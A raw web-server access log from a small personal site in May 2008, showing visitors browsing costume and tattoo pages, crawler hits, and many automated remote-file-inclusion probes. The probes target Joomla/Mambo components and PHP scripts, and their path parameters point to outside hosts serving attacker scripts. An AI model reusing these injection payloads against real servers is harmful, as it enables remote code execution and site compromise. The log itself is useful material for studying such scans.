67.158.77.110 - - [10/May/2008:09:35:12 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.158.77.110 - - [10/May/2008:09:35:12 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.158.77.110 - - [10/May/2008:09:35:17 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
67.158.77.110 - - [10/May/2008:09:35:38 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.59.128.51 - - [10/May/2008:09:40:47 -0500] "GET /logs/access_log.1207180800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 353 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:09:40:47 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:09:40:47 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
74.6.16.183 - - [10/May/2008:09:42:24 -0500] "GET /logs/access_log.1184544000 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.201.146.236 - - [10/May/2008:09:42:40 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.201.146.236 - - [10/May/2008:09:42:40 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.201.146.236 - - [10/May/2008:09:42:40 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.201.146.236 - - [10/May/2008:09:42:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
213.198.59.92 - - [10/May/2008:09:43:37 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
213.198.59.92 - - [10/May/2008:09:43:38 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
65.55.208.121 - - [10/May/2008:09:51:28 -0500] "GET /logs/access_log.1186790400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.198.59.92 - - [10/May/2008:09:54:07 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.198.59.92 - - [10/May/2008:09:54:07 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.116.44.60 - - [10/May/2008:09:54:42 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
208.116.44.60 - - [10/May/2008:09:54:42 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://bgsro.go.ro/id5.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
65.55.208.133 - - [10/May/2008:10:00:48 -0500] "GET /logs/access_log.1188000000 HTTP/1.1" 200 183592 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.255.117.182 - - [10/May/2008:10:01:01 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
88.255.117.182 - - [10/May/2008:10:01:01 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
213.218.137.36 - - [10/May/2008:10:03:32 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://skanner.890m.com/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
213.218.137.36 - - [10/May/2008:10:03:32 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://skanner.890m.com/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
213.218.137.36 - - [10/May/2008:10:03:36 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
213.218.137.36 - - [10/May/2008:10:03:36 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
82.149.248.210 - - [10/May/2008:10:04:16 -0500] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.149.248.210 - - [10/May/2008:10:04:17 -0500] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.193.232.188 - - [10/May/2008:10:04:25 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
62.193.232.188 - - [10/May/2008:10:04:25 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
74.6.22.60 - - [10/May/2008:10:08:28 -0500] "GET /logs/access_log.1193616000 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.66.123.148 - - [10/May/2008:10:09:08 -0500] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.66.123.148 - - [10/May/2008:10:09:09 -0500] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.66.123.148 - - [10/May/2008:10:09:16 -0500] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.66.123.148 - - [10/May/2008:10:09:16 -0500] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.31.205.148 - - [10/May/2008:10:10:00 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
85.31.205.148 - - [10/May/2008:10:10:00 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
70.85.96.74 - - [10/May/2008:10:13:02 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://skanner.890m.com/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
70.85.96.74 - - [10/May/2008:10:13:02 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://skanner.890m.com/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
194.106.224.69 - - [10/May/2008:10:16:13 -0500] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.106.224.69 - - [10/May/2008:10:16:13 -0500] "GET /logs//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.106.224.69 - - [10/May/2008:10:16:13 -0500] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
194.106.224.69 - - [10/May/2008:10:16:13 -0500] "GET //index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=http://adng.freecoolsite.com/files/adu.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.6.23.26 - - [10/May/2008:10:20:47 -0500] "GET /logs/access_log.1157414400 HTTP/1.0" 200 227501 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.172.146.49 - - [10/May/2008:10:22:20 -0500] "GET /logs/access_log.1207180800/login.php?includedir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.172.146.49 - - [10/May/2008:10:22:21 -0500] "GET /login.php?includedir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.172.146.49 - - [10/May/2008:10:22:21 -0500] "GET /logs/login.php?includedir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
74.6.17.55 - - [10/May/2008:10:23:28 -0500] "GET /logs/access_log.1183680000 HTTP/1.0" 200 147395 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.176.28 - - [10/May/2008:10:26:21 -0500] "GET /logs//?pag=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 200 82992 "-""libwww-perl/5.805"
89.111.176.28 - - [10/May/2008:10:26:22 -0500] "GET //?pag=http://www.2knowit.net/modules/arab.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
84.19.176.158 - - [10/May/2008:10:50:38 -0500] "GET /logs/squirrelcart/cart_content.php?cart_isp_root=http://themegasonics.flashpotdesigns.com/book/tmp/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
84.19.176.158 - - [10/May/2008:10:50:38 -0500] "GET /squirrelcart/cart_content.php?cart_isp_root=http://themegasonics.flashpotdesigns.com/book/tmp/readme.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
67.19.61.90 - - [10/May/2008:10:50:57 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.19.61.90 - - [10/May/2008:10:50:57 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
64.42.243.129 - - [10/May/2008:10:53:00 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:10:53:00 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
65.55.208.137 - - [10/May/2008:10:56:37 -0500] "GET /logs/access_log.1174003200 HTTP/1.1" 200 208145 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.126.108.198 - - [10/May/2008:10:57:36 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
200.126.108.198 - - [10/May/2008:10:57:36 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 338 "-""Avant Browser (http://www.avantbrowser.com)"
209.59.128.51 - - [10/May/2008:10:58:38 -0500] "GET /logs/admin.php?include_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
209.59.128.51 - - [10/May/2008:10:58:38 -0500] "GET /admin.php?include_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
64.42.243.129 - - [10/May/2008:11:01:25 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:11:01:25 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
195.54.9.218 - - [10/May/2008:11:07:58 -0500] "GET /logs/admin.php?include_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
195.54.9.218 - - [10/May/2008:11:07:58 -0500] "GET /admin.php?include_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.246.51.45 - - [10/May/2008:11:09:25 -0500] "GET /logs/admin.php?include_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.246.51.45 - - [10/May/2008:11:09:26 -0500] "GET /admin.php?include_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.208.124 - - [10/May/2008:11:11:38 -0500] "GET /logs/access_log.1186876800 HTTP/1.1" 200 217668 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.19.61.90 - - [10/May/2008:11:12:06 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
67.19.61.90 - - [10/May/2008:11:12:06 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
74.6.17.174 - - [10/May/2008:11:15:35 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.20.103 - - [10/May/2008:11:15:35 -0500] "GET /logs/access_log.1169078400 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.130.242.48 - - [10/May/2008:11:17:31 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
203.130.242.48 - - [10/May/2008:11:17:32 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
203.130.242.48 - - [10/May/2008:11:17:32 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
203.130.242.48 - - [10/May/2008:11:17:48 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
74.6.27.32 - - [10/May/2008:11:19:26 -0500] "GET /logs/access_log.1194393600 HTTP/1.0" 200 194805 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.19.176.158 - - [10/May/2008:11:21:22 -0500] "GET /logs/errors.php?error=http://themegasonics.flashpotdesigns.com/book/tmp/readme.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
84.19.176.158 - - [10/May/2008:11:21:22 -0500] "GET /errors.php?error=http://themegasonics.flashpotdesigns.com/book/tmp/readme.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
83.172.146.49 - - [10/May/2008:11:28:57 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
83.172.146.49 - - [10/May/2008:11:28:57 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
89.248.166.155 - - [10/May/2008:11:29:41 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.248.166.155 - - [10/May/2008:11:29:41 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.248.166.155 - - [10/May/2008:11:30:37 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.248.166.155 - - [10/May/2008:11:30:37 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
85.17.138.13 - - [10/May/2008:11:34:32 -0500] "GET /logs/scanhttp://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
85.17.138.13 - - [10/May/2008:11:34:33 -0500] "GET /scanhttp://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
74.6.16.249 - - [10/May/2008:11:34:49 -0500] "GET /logs/access_log.1174348800 HTTP/1.0" 200 228362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.138.13 - - [10/May/2008:11:35:16 -0500] "GET /logs/scanhttp://h1.ripway.com/elmalia/new.gif? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
85.17.138.13 - - [10/May/2008:11:35:16 -0500] "GET /scanhttp://h1.ripway.com/elmalia/new.gif? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
85.17.138.13 - - [10/May/2008:11:35:18 -0500] "GET /scanhttp://www.i-promo.info/test.txt? HTTP/1.1" 404 320 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.138.13 - - [10/May/2008:11:35:48 -0500] "GET /logs/scanhttp://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
85.17.138.13 - - [10/May/2008:11:35:48 -0500] "GET /scanhttp://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
212.241.192.85 - - [10/May/2008:11:37:05 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
212.241.192.85 - - [10/May/2008:11:37:05 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diabeteszones.com/templates/fs-green/css/id.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
69.73.139.10 - - [10/May/2008:11:38:02 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
69.73.139.10 - - [10/May/2008:11:38:02 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
80.91.91.11 - - [10/May/2008:11:41:54 -0500] "GET /logs/scanhttp://h1.ripway.com/elmalia/seep.gif? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
80.91.91.11 - - [10/May/2008:11:41:55 -0500] "GET /scanhttp://h1.ripway.com/elmalia/seep.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
77.234.201.88 - - [10/May/2008:11:46:42 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
77.234.201.88 - - [10/May/2008:11:46:42 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
77.234.201.88 - - [10/May/2008:11:47:33 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
77.234.201.88 - - [10/May/2008:11:47:33 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
85.17.138.13 - - [10/May/2008:11:47:55 -0500] "GET /logs/scanhttp://h1.ripway.com/mahesa/newbie.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
85.17.138.13 - - [10/May/2008:11:47:55 -0500] "GET /scanhttp://h1.ripway.com/mahesa/newbie.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
85.214.33.45 - - [10/May/2008:11:51:38 -0500] "GET /logs/admin.php?include_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.69"
85.214.33.45 - - [10/May/2008:11:51:38 -0500] "GET /admin.php?include_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.69"
85.214.33.45 - - [10/May/2008:11:51:43 -0500] "GET /logs/admin.php?include_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.69"
85.214.33.45 - - [10/May/2008:11:51:44 -0500] "GET /admin.php?include_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.69"
124.0.73.2 - - [10/May/2008:11:57:33 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.lycos.es/safes/test.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
202.179.180.41 - - [10/May/2008:11:57:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.41 - - [10/May/2008:11:57:44 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
8.2.208.4 - - [10/May/2008:11:57:58 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
8.2.208.4 - - [10/May/2008:11:57:58 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
8.2.208.4 - - [10/May/2008:11:57:59 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
8.2.208.4 - - [10/May/2008:11:58:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
8.2.208.4 - - [10/May/2008:11:58:19 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
8.2.208.4 - - [10/May/2008:11:58:19 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
8.2.208.4 - - [10/May/2008:11:58:20 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
8.2.208.4 - - [10/May/2008:11:58:21 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
